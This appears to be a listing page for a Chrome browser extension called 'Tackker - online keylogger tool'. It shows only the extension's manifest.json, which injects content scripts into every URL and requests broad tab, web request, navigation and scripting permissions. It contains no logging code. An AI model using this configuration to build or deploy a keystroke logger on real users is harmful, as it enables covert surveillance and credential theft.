Tackker - online keylogger tool

Tackker - online keylogger tool

Tackker is online keylogger tool that helps you log the keystrokes and other user data.

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "manifest_version": 3,
  "name": "Tackker - online keylogger tool",
  "description": "Tackker is online keylogger tool that helps you log the keystrokes and other user data.",
  "version": "1.3",
  "icons": {
    "16": "tackker-keylogger16.png",
    "48": "tackker-keylogger48.png",
    "128": "tackker-keylogger128.png"
  },
  "action": {},
  "background": {
    "service_worker": "back.js",
    "type": "module"
  },
  "content_scripts": [
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "jquery-3.5.0.min.js",
        "content.js"
      ]
    }
  ],
  "permissions": [
    "alarms",
    "tabs",
    "webRequest",
    "webNavigation",
    "scripting",
    "storage",
    "unlimitedStorage"
  ]
}